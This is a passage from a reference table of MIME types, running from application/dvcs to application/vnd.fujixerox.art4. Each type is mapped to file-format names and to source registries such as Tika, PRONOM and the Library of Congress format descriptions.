application/dvcsapplication/dvcs tika
application/dwfDWF ffw
—  application/dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  application/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  drawing/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  image/vnd.dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  image/x-dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
—  model/vnd.dwf; version=”6.0″AutoCAD Design Web Format 6.0 pronom
application/dwgDWG ffw
AutoCad Drawing tika
application/dxfDXF ffw
application/ecmascriptActionScript ffw
ECMAScript ffw
application/ecmascript tika
ECMAScript Language (ECMA-262), including JavaScript fdd
application/edi-consentapplication/edi-consent tika
application/edi-x12application/edi-x12 tika
application/edifactapplication/edifact tika
application/emma+xmlapplication/emma+xml tika
application/epp+xmlapplication/epp+xml tika
application/epub+zipEPUB ffw
RePub ffw
Digital Replica Plus ffw
Electronic Publication tika
ePub format pronom
EPUB, Electronic Publication, Version 2 fdd
EPUB, Electronic Publication, Version 3.0.1 (2014). ISO/IEC 23736:2020 fdd
EPUB, Electronic Publication, Version 3.0 (2011). ISO/IEC TS 30135:2014 fdd
EPUB (Electronic Publication) File Format Family fdd
EPUB, Electronic Publication, Version 3.2 fdd
—  application/x-ibooks+zipApple iBooks Author publication format tika
Apple iBook format pronom
application/eshopapplication/eshop tika
application/exampleapplication/example tika
application/f4mF4M ffw
application/fastinfosetapplication/fastinfoset tika
application/fastsoapapplication/fastsoap tika
application/fitsFlexible Image Transport System ffw
Flexible Image Transport System tika
Flexible Image Transport System pronom
Flexible Image Transport System (FITS), Version 3.0 fdd
—  image/fitsFlexible Image Transport System ffw
image/fits tika
Flexible Image Transport System pronom
Flexible Image Transport System (FITS), Version 3.0 fdd
application/font-tdpfrPFR ffw
application/font-tdpfr tika
application/font-woffWOFF ffw
Web Open Font Format pronom
application/freemindMm ffw
application/futuresplashSWF ffw
Macromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
application/gdiffGDIFF ffw
application/geopackage+sqlite3GeoPackage Encoding Standard (OGC) Format Family fdd
application/gml+xmlGeography Markup Language pronom
application/gzipGzip Compressed Archive tika
application/gzip-compressedGzip Compressed Archive tika
application/gzippedGzip Compressed Archive tika
application/h224application/h224 tika
application/httpapplication/http tika
application/hyperstudioapplication/hyperstudio tika
application/ibe-key-request+xmlapplication/ibe-key-request+xml tika
application/ibe-pkg-reply+xmlapplication/ibe-pkg-reply+xml tika
application/ibe-pp-dataapplication/ibe-pp-data tika
application/igesIGES ffw
application/iges tika
application/im-iscomposing+xmlapplication/im-iscomposing+xml tika
application/indexapplication/index tika
application/index.cmdapplication/index.cmd tika
application/index.objapplication/index.obj tika
application/index.responseapplication/index.response tika
application/index.vndapplication/index.vnd tika
application/internet-shortcutInternet Shortcut ffw
application/iotpapplication/iotp tika
application/ippapplication/ipp tika
application/isupapplication/isup tika
application/java-serialized-objectapplication/java-serialized-object tika
application/java-vmJava Class File tika
application/jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
application/json-patch+jsonJSON Patch ffw
application/kpml-request+xmlapplication/kpml-request+xml tika
application/kpml-response+xmlapplication/kpml-response+xml tika
application/ld+jsonJSON-LD ffw
Web Annotation Protocol ffw
application/lost+xmlapplication/lost+xml tika
application/lotus123; version=”3.0″Lotus 1-2-3 Worksheet 3.0 pronom
application/lotus123; version=”4-5″Lotus 1-2-3 Worksheet 4-5 pronom
application/lwp; version=”96″Lotus WordPro Document 96 pronom
application/lwp; version=”97/millennium”Lotus WordPro Document 97/Millennium pronom
application/mac-binhexBinHex ffw
application/mac-binhex40 tika
application/mac-binhex40BinHex ffw
application/mac-binhex40 tika
application/mac-compactproapplication/mac-compactpro tika
application/macbinaryMacBinary ffw
application/macwriteiiapplication/macwriteii tika
application/marcMARC ffw
application/marc tika
application/mathematicaapplication/mathematica tika
Mathematica Notebook pronom
application/mathml+xmlapplication/mathml+xml tika
application/matlab-matapplication/x-matlab-data tika
MAT-File Level 5 File Format fdd
application/mbms-associated-procedure-description+xmlapplication/mbms-associated-procedure-description+xml tika
application/mbms-deregister+xmlapplication/mbms-deregister+xml tika
application/mbms-envelope+xmlapplication/mbms-envelope+xml tika
application/mbms-msk+xmlapplication/mbms-msk+xml tika
application/mbms-msk-response+xmlapplication/mbms-msk-response+xml tika
application/mbms-protection-description+xmlapplication/mbms-protection-description+xml tika
application/mbms-reception-report+xmlapplication/mbms-reception-report+xml tika
application/mbms-register+xmlapplication/mbms-register+xml tika
application/mbms-register-response+xmlapplication/mbms-register-response+xml tika
application/mbms-user-service-description+xmlapplication/mbms-user-service-description+xml tika
application/media_control+xmlapplication/media_control+xml tika
application/mediaservercontrol+xmlapplication/mediaservercontrol+xml tika
application/mikeyapplication/mikey tika
application/moss-keysapplication/moss-keys tika
application/moss-signatureapplication/moss-signature tika
application/mosskey-dataapplication/mosskey-data tika
application/mosskey-requestapplication/mosskey-request tika
application/mp4application/mp4 tika
MPEG-4 Media File pronom
MPEG-4 File Format, Version 2 fdd
application/mpeg4-genericapplication/mpeg4-generic tika
application/mpeg4-iodapplication/mpeg4-iod tika
MPEG-4 File Format, Version 2 fdd
application/mpeg4-iod-xmtapplication/mpeg4-iod-xmt tika
MPEG-4, eXtensible MPEG-4 Textual Format (XMT) fdd
MPEG-4 File Format, Version 2 fdd
application/ms-tnefapplication/vnd.ms-tnef tika
application/msonenoteMicrosoft OneNote pronom
application/msword2Microsoft Word 2 Document tika
application/msword5Microsoft Word 5 Document tika
application/mxfMXF ffw
application/mxf tika
Material Exchange Format (MXF) fdd
—  application/mxf; version=”operational pattern 1a”Material Exchange Format Operational Pattern 1a pronom
—  application/mxf; version=”operational pattern 1b”Material Exchange Format Operational Pattern 1b pronom
—  application/mxf; version=”operational pattern 1c”Material Exchange Format Operational Pattern 1c pronom
—  application/mxf; version=”operational pattern 2a”Material Exchange Format Operational Pattern 2a pronom
—  application/mxf; version=”operational pattern 2b”Material Exchange Format Operational Pattern 2b pronom
—  application/mxf; version=”operational pattern 2c”Material Exchange Format Operational Pattern 2c pronom
—  application/mxf; version=”operational pattern 3a”Material Exchange Format Operational Pattern 3a pronom
—  application/mxf; version=”operational pattern 3b”Material Exchange Format Operational Pattern 3b pronom
—  application/mxf; version=”operational pattern 3c”Material Exchange Format Operational Pattern 3c pronom
—  application/mxf; version=”operational pattern op-atom”Material Exchange Format Operational Pattern OP-ATOM pronom
application/nasdataapplication/nasdata tika
application/netcdfNetCDF ffw
netCDF-3 Classic pronom
netCDF-3 64-bit pronom
application/news-checkgroupsapplication/news-checkgroups tika
application/news-groupinfoapplication/news-groupinfo tika
application/news-transmissionapplication/news-transmission tika
application/nssapplication/nss tika
application/ocsp-requestapplication/ocsp-request tika
application/ocsp-responseapplication/ocsp-response tika
application/octet-streamTemplate:File Format/Preload ffw
application/octet-stream tika
Windows Portable Executable pronom
AutoCAD Database File Locking Information pronom
form*Z Project File pronom
Revit Family File pronom
Revit Family Template pronom
Revit Template pronom
Revit External Group pronom
Revit Project pronom
Revit Workspace pronom
SketchUp Document pronom
TrueType Font pronom
cc:Mail Archive Email Format fdd
—  application/octet-stream; version=”32 bit”Windows Portable Executable 32 bit pronom
—  application/octet-stream; version=”4″CATIA Model 4 pronom
CATIA Project 4 pronom
—  application/octet-stream; version=”5″CATIA 5 pronom
CATIA Model (Part Description) 5 pronom
CATIA Product Description 5 pronom
—  application/octet-stream; version=”64 bit”Windows Portable Executable 64 bit pronom
—  application/octet-stream; version=”generic”Adobe InDesign Document Generic pronom
application/odaapplication/oda tika
application/oebps-package+xmlapplication/oebps-package+xml tika
application/oggOgg ffw
Vorbis ffw
Ogg Skeleton ffw
application/ogg tika
Ogg Multimedia Container pronom
Ogg File Format fdd
Ogg Vorbis Audio Format fdd
—  application/kateKate ffw
application/kate tika
—  audio/oggOgg ffw
Speex ffw
Vorbis ffw
Ogg Skeleton ffw
Ogg Vorbis Audio tika
Ogg Vorbis Codec Compressed Multimedia File pronom
Ogg Opus Codec Compressed Multimedia File pronom
Ogg FLAC Compressed Multimedia File pronom
Ogg Speex Codec Multimedia File pronom
— —  application/x-oggapplication/ogg tika
Ogg Vorbis Codec Compressed WAV File tika
Ogg File Format fdd
Ogg Vorbis Audio Format fdd
— —  application/x-speexOgg Speex Codec Compressed WAV File tika
— —  audio/opusOgg Opus Codec Compressed WAV File tika
Ogg Opus Codec Compressed Multimedia File pronom
— —  audio/speexOgg Speex Codec Compressed WAV File tika
Ogg Speex Codec Multimedia File pronom
Speex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
— —  audio/vorbisOgg Vorbis Codec Compressed WAV File tika
— —  audio/x-ogg-flacOgg Packaged Free Lossless Audio Codec tika
— —  audio/x-ogg-pcmOgg Packaged Unompressed WAV File tika
— —  audio/x-oggflacOgg Packaged Free Lossless Audio Codec tika
— —  audio/x-oggpcmOgg Packaged Unompressed WAV File tika
—  video/oggOgg ffw
Ogg Skeleton ffw
Ogg Vorbis Video tika
Ogg Theora Video pronom
— —  video/daalaOgg Daala Video tika
— —  video/theoraOgg Theora Video tika
— —  video/x-daalaOgg Daala Video tika
— —  video/x-diracOgg Packaged Dirac Video tika
— —  video/x-ogg-rgbOgg Packaged Raw RGB Video tika
— —  video/x-ogg-uvsOgg Packaged Raw UVS Video tika
— —  video/x-ogg-yuvOgg Packaged Raw YUV Video tika
— —  video/x-oggrgbOgg Packaged Raw RGB Video tika
— —  video/x-ogguvsOgg Packaged Raw UVS Video tika
— —  video/x-oggyuvOgg Packaged Raw YUV Video tika
— —  video/x-ogmOgg Packaged OGM Video tika
— —  video/x-theoraOgg Theora Video tika
application/onenoteapplication/onenote tika
application/packagePackage (Web) ffw
application/parityfecapplication/parityfec tika
application/patch-ops-error+xmlapplication/patch-ops-error+xml tika
application/pdfPDF ffw
Portable Document Format tika
Acrobat PDF/X – Portable Document Format – Exchange 1:1999 pronom
Acrobat PDF/X – Portable Document Format – Exchange 1:2001 pronom
Acrobat PDF/X – Portable Document Format – Exchange 1a:2003 pronom
Acrobat PDF/X – Portable Document Format – Exchange 2:2003 pronom
Acrobat PDF/X – Portable Document Format – Exchange 3:2003 pronom
Acrobat PDF/X – Portable Document Format – Exchange 1a:2001 pronom
Acrobat PDF/X – Portable Document Format – Exchange 3:2002 pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-4 pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-4p pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-5g pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-5pg pronom
Acrobat PDF/X – Portable Document Format – Exchange PDF/X-5n pronom
Acrobat PDF/E – Portable Document Format for Engineering PDF/E-1 pronom
PDF, Version 1.5 fdd
PDF_1_3, PDF Versions 1.0-1.3 fdd
PDF, Version 1.7 (ISO 32000-1:2008) fdd
PDF, Version 1.6 fdd
PDF 2.0, ISO 32000-2 (2017, 2020) fdd
PDF (Portable Document Format) Family fdd
PDF/R-1, (Raster image transport and storage). Encrypted, based on PDF 2.0 (ISO 32000-2) fdd
PDF/A-1, PDF for Long-term Preservation, Use of PDF 1.4 fdd
PDF/R-1 (Raster image transport and storage.) Based on PDF 1.4-1.7 (ISO 32000-1) fdd
PDF_1_4, PDF Version 1.4 fdd
—  application/pdf; version=”1.0″Acrobat PDF 1.0 – Portable Document Format 1.0 pronom
—  application/pdf; version=”1.1″Acrobat PDF 1.1 – Portable Document Format 1.1 pronom
—  application/pdf; version=”1.2″Acrobat PDF 1.2 – Portable Document Format 1.2 pronom
—  application/pdf; version=”1.3″Acrobat PDF 1.3 – Portable Document Format 1.3 pronom
—  application/pdf; version=”1.4″Acrobat PDF 1.4 – Portable Document Format 1.4 pronom
—  application/pdf; version=”1.5″Acrobat PDF 1.5 – Portable Document Format 1.5 pronom
—  application/pdf; version=”1.6″Acrobat PDF 1.6 – Portable Document Format 1.6 pronom
—  application/pdf; version=”1.7″Acrobat PDF 1.7 – Portable Document Format 1.7 pronom
—  application/pdf; version=”1a”Acrobat PDF/A – Portable Document Format 1a pronom
—  application/pdf; version=”1b”Acrobat PDF/A – Portable Document Format 1b pronom
—  application/pdf; version=”2a”Acrobat PDF/A – Portable Document Format 2a pronom
—  application/pdf; version=”2b”Acrobat PDF/A – Portable Document Format 2b pronom
—  application/pdf; version=”2u”Acrobat PDF/A – Portable Document Format 2u pronom
—  application/pdf; version=”3a”Acrobat PDF/A – Portable Document Format 3a pronom
—  application/pdf; version=”3b”Acrobat PDF/A – Portable Document Format 3b pronom
—  application/pdf; version=”3u”Acrobat PDF/A – Portable Document Format 3u pronom
application/pgpapplication/pgp-encrypted tika
Public Key githublinguist
application/pgp-encryptedapplication/pgp-encrypted tika
application/pgp-keysapplication/pgp-keys tika
application/pgp-signatureapplication/pgp-signature tika
application/photoshopPhotoshop Image tika
application/pics-rulesapplication/pics-rules tika
application/pidf+xmlapplication/pidf+xml tika
application/pidf-diff+xmlapplication/pidf-diff+xml tika
application/pkcs10PKCS10 ffw
application/pkcs10 tika
application/pkcs7-mimeapplication/pkcs7-mime tika
application/pkcs7-signatureapplication/pkcs7-signature tika
application/pkix-certapplication/pkix-cert tika
application/pkix-crlapplication/pkix-crl tika
application/pkix-pkipathapplication/pkix-pkipath tika
application/pkixcmpapplication/pkixcmp tika
application/playerproModule Music Formats (Mods) fdd
application/pls+xmlapplication/pls+xml tika
application/poc-settings+xmlapplication/poc-settings+xml tika
application/postscriptPostScript ffw
PostScript tika
Encapsulated PostScript (EPS) File Format, Version 3.x fdd
PostScript Format Family fdd
—  application/illustratorAdobe Illustrator Artwork tika
—  application/postscript; version=”1.0 / 1.1″Adobe Illustrator 1.0 / 1.1 pronom
—  application/postscript; version=”1.0″Postscript 1.0 pronom
—  application/postscript; version=”1.2″Encapsulated PostScript File Format 1.2 pronom
—  application/postscript; version=”10.0″Adobe Illustrator 10.0 pronom
—  application/postscript; version=”11.0″Adobe Illustrator 11.0 pronom
—  application/postscript; version=”12.0″Adobe Illustrator 12.0 pronom
—  application/postscript; version=”13.0″Adobe Illustrator 13.0 pronom
—  application/postscript; version=”14.0″Adobe Illustrator 14.0 pronom
—  application/postscript; version=”15.0″Adobe Illustrator 15.0 pronom
—  application/postscript; version=”16.0″Adobe Illustrator 16.0 pronom
—  application/postscript; version=”2.0″Encapsulated PostScript File Format 2.0 pronom
PostScript 2.0 pronom
—  application/postscript; version=”2.1″PostScript 2.1 pronom
—  application/postscript; version=”3″Encapsulated PostScript File Format 3 pronom
—  application/postscript; version=”3.0 / 3.2″Adobe Illustrator 3.0 / 3.2 pronom
—  application/postscript; version=”3.0″PostScript 3.0 pronom
—  application/postscript; version=”3.1″PostScript 3.1 pronom
—  application/postscript; version=”4.0″Adobe Illustrator 4.0 pronom
—  application/postscript; version=”5.0 / 5.5″Adobe Illustrator 5.0 / 5.5 pronom
—  application/postscript; version=”6.0″Adobe Illustrator 6.0 pronom
—  application/postscript; version=”7.0″Adobe Illustrator 7.0 pronom
—  application/postscript; version=”8.0″Adobe Illustrator 8.0 pronom
—  application/postscript; version=”88″Adobe Illustrator 88 pronom
—  application/postscript; version=”9.0″Adobe Illustrator 9.0 pronom
—  application/postscript; version=”japan”Adobe Illustrator Japan pronom
application/prs.alvestrand.titrax-sheetapplication/prs.alvestrand.titrax-sheet tika
application/prs.cwwapplication/prs.cww tika
application/prs.nprendapplication/prs.nprend tika
application/prs.pluckerapplication/prs.plucker tika
application/qifQuicken Interchange Format pronom
application/qsigapplication/qsig tika
application/reginfo+xmlapplication/reginfo+xml tika
application/remote-printingapplication/remote-printing tika
application/resource-lists+xmlapplication/resource-lists+xml tika
application/resource-lists-diff+xmlapplication/resource-lists-diff+xml tika
application/riscosapplication/riscos tika
application/rlmi+xmlapplication/rlmi+xml tika
application/rls-services+xmlapplication/rls-services+xml tika
application/rsd+xmlapplication/rsd+xml tika
application/rss+xmlRSS ffw
application/rss+xml tika
application/rtxapplication/rtx tika
application/samlassertion+xmlapplication/samlassertion+xml tika
application/samlmetadata+xmlapplication/samlmetadata+xml tika
application/sbml+xmlapplication/sbml+xml tika
application/scvp-cv-requestapplication/scvp-cv-request tika
application/scvp-cv-responseapplication/scvp-cv-response tika
application/scvp-vp-requestapplication/scvp-vp-request tika
application/scvp-vp-responseapplication/scvp-vp-response tika
application/sdpapplication/sdp tika
application/serealSereal binary serialization format tika
—  application/sereal;version=1application/sereal;version=1 tika
—  application/sereal;version=2application/sereal;version=2 tika
—  application/sereal;version=3application/sereal;version=3 tika
application/set-paymentapplication/set-payment tika
application/set-payment-initiationapplication/set-payment-initiation tika
application/set-registrationapplication/set-registration tika
application/set-registration-initiationapplication/set-registration-initiation tika
application/sgmlSGML ffw
application/sgml tika
Standard Generalized Markup Language (SGML). ISO 8879:1986 fdd
application/sgml-open-catalogapplication/sgml-open-catalog tika
application/shf+xmlapplication/shf+xml tika
application/sieveapplication/sieve tika
Sieve githublinguist
application/simple-filter+xmlapplication/simple-filter+xml tika
application/simple-message-summaryapplication/simple-message-summary tika
application/simplesymbolcontainerapplication/simplesymbolcontainer tika
application/slaSTL (STereoLithography) File Format, Binary fdd
STL (STereoLithography) File Format Family fdd
STL (STereoLithography) File Format, ASCII fdd
application/slateapplication/slate tika
application/sldAutoCAD Slide pronom
application/smilSMIL Multimedia tika
application/smil+xmlSMIL Multimedia tika
application/soap+fastinfosetapplication/soap+fastinfoset tika
application/soap+xmlapplication/soap+xml tika
application/soundappModule Music Formats (Mods) fdd
Module Music Formats (Mods) fdd
application/sparql-queryapplication/sparql-query tika
SPARQL githublinguist
application/sparql-results+xmlapplication/sparql-results+xml tika
application/spirits-event+xmlapplication/spirits-event+xml tika
application/srgsapplication/srgs tika
application/srgs+xmlapplication/srgs+xml tika
application/ssml+xmlSpeech Synthesis Markup Language ffw
application/ssml+xml tika
application/tifTIFF, Revision 6.0 fdd
application/tiffTIFF, Revision 6.0 fdd
application/timestamp-queryapplication/timestamp-query tika
application/timestamp-replyapplication/timestamp-reply tika
application/tve-triggerapplication/tve-trigger tika
application/typescriptTypeScript githublinguist
application/ulpfecapplication/ulpfec tika
application/vemmiapplication/vemmi tika
application/vividence.scriptfileapplication/vividence.scriptfile tika
application/vnd.3gpp.bsf+xmlapplication/vnd.3gpp.bsf+xml tika
application/vnd.3gpp.pic-bw-largeapplication/vnd.3gpp.pic-bw-large tika
application/vnd.3gpp.pic-bw-smallapplication/vnd.3gpp.pic-bw-small tika
application/vnd.3gpp.pic-bw-varapplication/vnd.3gpp.pic-bw-var tika
application/vnd.3gpp.smsapplication/vnd.3gpp.sms tika
application/vnd.3gpp2.bcmcsinfo+xmlapplication/vnd.3gpp2.bcmcsinfo+xml tika
application/vnd.3gpp2.smsapplication/vnd.3gpp2.sms tika
application/vnd.3gpp2.tcapapplication/vnd.3gpp2.tcap tika
application/vnd.3m.post-it-notesapplication/vnd.3m.post-it-notes tika
application/vnd.accpac.simply.asoapplication/vnd.accpac.simply.aso tika
application/vnd.accpac.simply.impapplication/vnd.accpac.simply.imp tika
application/vnd.acucobolapplication/vnd.acucobol tika
application/vnd.acucorpapplication/vnd.acucorp tika
application/vnd.adobe.adept+xmlAdobe Content Server Message File pronom
application/vnd.adobe.aftereffects.projectapplication/vnd.adobe.aftereffects.project tika
application/vnd.adobe.aftereffects.templateapplication/vnd.adobe.aftereffects.template tika
application/vnd.adobe.air-application-installer-package+zipapplication/vnd.adobe.air-application-installer-package+zip tika
—  application/vnd.adobe.air-application-installer-package+zip; version=”1.0″Adobe Air 1.0 pronom
—  application/vnd.adobe.air-application-installer-package+zip; version=”1.5″Adobe Air 1.5 pronom
—  application/vnd.adobe.air-application-installer-package+zip; version=”2.0″Adobe Air 2.0 pronom
application/vnd.adobe.flash-movieSWF ffw
application/vnd.adobe.folio+zipFolio ffw
application/vnd.adobe.indesign-idml-packageIDML ffw
application/vnd.adobe.pdfxmlPDFXML ffw
application/vnd.adobe.x-marsPDFXML ffw
application/vnd.adobe.xdp+xmlXDP ffw
application/vnd.adobe.xdp+xml tika
application/vnd.adobe.xfdfXFDF ffw
application/vnd.adobe.xfdf tika
application/vnd.aether.impapplication/vnd.aether.imp tika
application/vnd.airzip.filesecure.azfapplication/vnd.airzip.filesecure.azf tika
application/vnd.airzip.filesecure.azsapplication/vnd.airzip.filesecure.azs tika
application/vnd.amazon.ebookapplication/vnd.amazon.ebook tika
Mobipocket File Format fdd
application/vnd.americandynamics.accapplication/vnd.americandynamics.acc tika
application/vnd.amiga.amiapplication/vnd.amiga.ami tika
application/vnd.anser-web-certificate-issue-initiationapplication/vnd.anser-web-certificate-issue-initiation tika
application/vnd.anser-web-funds-transfer-initiationapplication/vnd.anser-web-funds-transfer-initiation tika
application/vnd.antix.game-componentapplication/vnd.antix.game-component tika
application/vnd.api+jsonJSON API ffw
application/vnd.apple.installer+xmlapplication/vnd.apple.installer+xml tika
application/vnd.apple.pkpassPKPass ffw
application/vnd.arastra.swiapplication/vnd.arastra.swi tika
application/vnd.audiographapplication/vnd.audiograph tika
application/vnd.autopackageapplication/vnd.autopackage tika
application/vnd.avistar+xmlapplication/vnd.avistar+xml tika
application/vnd.blueice.multipassapplication/vnd.blueice.multipass tika
application/vnd.bluetooth.ep.oobapplication/vnd.bluetooth.ep.oob tika
application/vnd.bmiapplication/vnd.bmi tika
application/vnd.businessobjectsapplication/vnd.businessobjects tika
application/vnd.cab-jscriptapplication/vnd.cab-jscript tika
application/vnd.canon-cpdlapplication/vnd.canon-cpdl tika
application/vnd.canon-lipsapplication/vnd.canon-lips tika
application/vnd.cendio.thinlinc.clientconfapplication/vnd.cendio.thinlinc.clientconf tika
application/vnd.chemdraw+xmlapplication/vnd.chemdraw+xml tika
application/vnd.chess-pgnPGN ffw
application/vnd.chipnuts.karaoke-mmdapplication/vnd.chipnuts.karaoke-mmd tika
application/vnd.cinderellaapplication/vnd.cinderella tika
application/vnd.cirpack.isdn-extapplication/vnd.cirpack.isdn-ext tika
application/vnd.claymoreapplication/vnd.claymore tika
application/vnd.clonk.c4groupapplication/vnd.clonk.c4group tika
application/vnd.coffeescriptCoffeeScript ffw
application/vnd.comicbook+zipComic Book Archive ffw
application/vnd.comicbook-rarComic Book Archive ffw
application/vnd.commerce-battelleapplication/vnd.commerce-battelle tika
application/vnd.commonspaceapplication/vnd.commonspace tika
application/vnd.contact.cmsgapplication/vnd.contact.cmsg tika
application/vnd.cosmocallerapplication/vnd.cosmocaller tika
application/vnd.crick.clickerapplication/vnd.crick.clicker tika
application/vnd.crick.clicker.keyboardapplication/vnd.crick.clicker.keyboard tika
application/vnd.crick.clicker.paletteapplication/vnd.crick.clicker.palette tika
application/vnd.crick.clicker.templateapplication/vnd.crick.clicker.template tika
application/vnd.crick.clicker.wordbankapplication/vnd.crick.clicker.wordbank tika
application/vnd.criticaltools.wbs+xmlapplication/vnd.criticaltools.wbs+xml tika
application/vnd.ctc-posmlapplication/vnd.ctc-posml tika
application/vnd.ctct.ws+xmlapplication/vnd.ctct.ws+xml tika
application/vnd.cups-pdfapplication/vnd.cups-pdf tika
application/vnd.cups-postscriptapplication/vnd.cups-postscript tika
application/vnd.cups-ppdapplication/vnd.cups-ppd tika
application/vnd.cups-rasterCUPS Raster ffw
application/vnd.cups-raster tika
application/vnd.cups-rawapplication/vnd.cups-raw tika
application/vnd.curl.carapplication/vnd.curl.car tika
application/vnd.curl.pcurlapplication/vnd.curl.pcurl tika
application/vnd.cybankapplication/vnd.cybank tika
application/vnd.data-vision.rdzapplication/vnd.data-vision.rdz tika
application/vnd.denovo.fcselayout-linkapplication/vnd.denovo.fcselayout-link tika
application/vnd.dir-bi.plate-dl-nosuffixapplication/vnd.dir-bi.plate-dl-nosuffix tika
application/vnd.dnaapplication/vnd.dna tika
application/vnd.dolby.mlpapplication/vnd.dolby.mlp tika
application/vnd.dolby.mobile.1application/vnd.dolby.mobile.1 tika
application/vnd.dolby.mobile.2application/vnd.dolby.mobile.2 tika
application/vnd.dpgraphapplication/vnd.dpgraph tika
application/vnd.dreamfactoryapplication/vnd.dreamfactory tika
application/vnd.dvb.esgcontainerapplication/vnd.dvb.esgcontainer tika
application/vnd.dvb.ipdcdftnotifaccessapplication/vnd.dvb.ipdcdftnotifaccess tika
application/vnd.dvb.ipdcesgaccessapplication/vnd.dvb.ipdcesgaccess tika
application/vnd.dvb.ipdcroamingapplication/vnd.dvb.ipdcroaming tika
application/vnd.dvb.iptv.alfec-baseapplication/vnd.dvb.iptv.alfec-base tika
application/vnd.dvb.iptv.alfec-enhancementapplication/vnd.dvb.iptv.alfec-enhancement tika
application/vnd.dvb.notif-aggregate-root+xmlapplication/vnd.dvb.notif-aggregate-root+xml tika
application/vnd.dvb.notif-container+xmlapplication/vnd.dvb.notif-container+xml tika
application/vnd.dvb.notif-generic+xmlapplication/vnd.dvb.notif-generic+xml tika
application/vnd.dvb.notif-ia-msglist+xmlapplication/vnd.dvb.notif-ia-msglist+xml tika
application/vnd.dvb.notif-ia-registration-request+xmlapplication/vnd.dvb.notif-ia-registration-request+xml tika
application/vnd.dvb.notif-ia-registration-response+xmlapplication/vnd.dvb.notif-ia-registration-response+xml tika
application/vnd.dvb.notif-init+xmlapplication/vnd.dvb.notif-init+xml tika
application/vnd.dxrapplication/vnd.dxr tika
application/vnd.dynageoapplication/vnd.dynageo tika
application/vnd.ecdis-updateapplication/vnd.ecdis-update tika
application/vnd.ecowin.chartapplication/vnd.ecowin.chart tika
application/vnd.ecowin.filerequestapplication/vnd.ecowin.filerequest tika
application/vnd.ecowin.fileupdateapplication/vnd.ecowin.fileupdate tika
application/vnd.ecowin.seriesapplication/vnd.ecowin.series tika
application/vnd.ecowin.seriesrequestapplication/vnd.ecowin.seriesrequest tika
application/vnd.ecowin.seriesupdateapplication/vnd.ecowin.seriesupdate tika
application/vnd.emclient.accessrequest+xmlapplication/vnd.emclient.accessrequest+xml tika
application/vnd.enlivenapplication/vnd.enliven tika
application/vnd.epson.esfapplication/vnd.epson.esf tika
application/vnd.epson.msfapplication/vnd.epson.msf tika
application/vnd.epson.quickanimeapplication/vnd.epson.quickanime tika
application/vnd.epson.saltapplication/vnd.epson.salt tika
application/vnd.epson.ssfapplication/vnd.epson.ssf tika
application/vnd.ericsson.quickcallapplication/vnd.ericsson.quickcall tika
application/vnd.eszigno3+xmlapplication/vnd.eszigno3+xml tika
application/vnd.etsi.aoc+xmlapplication/vnd.etsi.aoc+xml tika
application/vnd.etsi.cug+xmlapplication/vnd.etsi.cug+xml tika
application/vnd.etsi.iptvcommand+xmlapplication/vnd.etsi.iptvcommand+xml tika
application/vnd.etsi.iptvdiscovery+xmlapplication/vnd.etsi.iptvdiscovery+xml tika
application/vnd.etsi.iptvprofile+xmlapplication/vnd.etsi.iptvprofile+xml tika
application/vnd.etsi.iptvsad-bc+xmlapplication/vnd.etsi.iptvsad-bc+xml tika
application/vnd.etsi.iptvsad-cod+xmlapplication/vnd.etsi.iptvsad-cod+xml tika
application/vnd.etsi.iptvsad-npvr+xmlapplication/vnd.etsi.iptvsad-npvr+xml tika
application/vnd.etsi.iptvueprofile+xmlapplication/vnd.etsi.iptvueprofile+xml tika
application/vnd.etsi.mcid+xmlapplication/vnd.etsi.mcid+xml tika
application/vnd.etsi.sci+xmlapplication/vnd.etsi.sci+xml tika
application/vnd.etsi.simservs+xmlapplication/vnd.etsi.simservs+xml tika
application/vnd.eudora.dataapplication/vnd.eudora.data tika
application/vnd.ezpix-albumapplication/vnd.ezpix-album tika
application/vnd.ezpix-packageapplication/vnd.ezpix-package tika
application/vnd.f-secure.mobileapplication/vnd.f-secure.mobile tika
application/vnd.fdfFDF ffw
Forms Data Format tika
application/vnd.fdsn.mseedapplication/vnd.fdsn.mseed tika
application/vnd.fdsn.seedapplication/vnd.fdsn.seed tika
application/vnd.ffsnsapplication/vnd.ffsns tika
application/vnd.fintsapplication/vnd.fints tika
application/vnd.flographitapplication/vnd.flographit tika
application/vnd.fluxtime.clipapplication/vnd.fluxtime.clip tika
application/vnd.font-fontforge-sfdSpline Font Database ffw
application/vnd.font-fontforge-sfd tika
application/vnd.framemakerFrameMaker ffw
application/vnd.framemaker tika
—  application/vnd.framemaker; version=”2.0″Adobe FrameMaker Document 2.0 pronom
—  application/vnd.framemaker; version=”3.0″Adobe FrameMaker Document 3.0 pronom
—  application/vnd.framemaker; version=”4.0″Adobe FrameMaker Document 4.0 pronom
—  application/vnd.framemaker; version=”5.0″Adobe FrameMaker Document 5.0 pronom
—  application/vnd.framemaker; version=”5.5″Adobe FrameMaker Document 5.5 pronom
—  application/vnd.framemaker; version=”6.0″Adobe FrameMaker Document 6.0 pronom
—  application/vnd.framemaker; version=”7.0″Adobe FrameMaker Document 7.0 pronom
—  application/vnd.framemaker; version=”8.0″Adobe FrameMaker Document 8.0 pronom
—  application/vnd.framemaker; version=”9.0″Adobe FrameMaker Document 9.0 pronom
application/vnd.frogans.fncapplication/vnd.frogans.fnc tika
application/vnd.frogans.ltfapplication/vnd.frogans.ltf tika
application/vnd.fsc.weblaunchapplication/vnd.fsc.weblaunch tika
application/vnd.fujitsu.oasysapplication/vnd.fujitsu.oasys tika
application/vnd.fujitsu.oasys2application/vnd.fujitsu.oasys2 tika
application/vnd.fujitsu.oasys3application/vnd.fujitsu.oasys3 tika
application/vnd.fujitsu.oasysgpapplication/vnd.fujitsu.oasysgp tika
application/vnd.fujitsu.oasysprsapplication/vnd.fujitsu.oasysprs tika
application/vnd.fujixerox.art-exapplication/vnd.fujixerox.art-ex tika
application/vnd.fujixerox.art4application/vnd.fujixerox.art4 tika
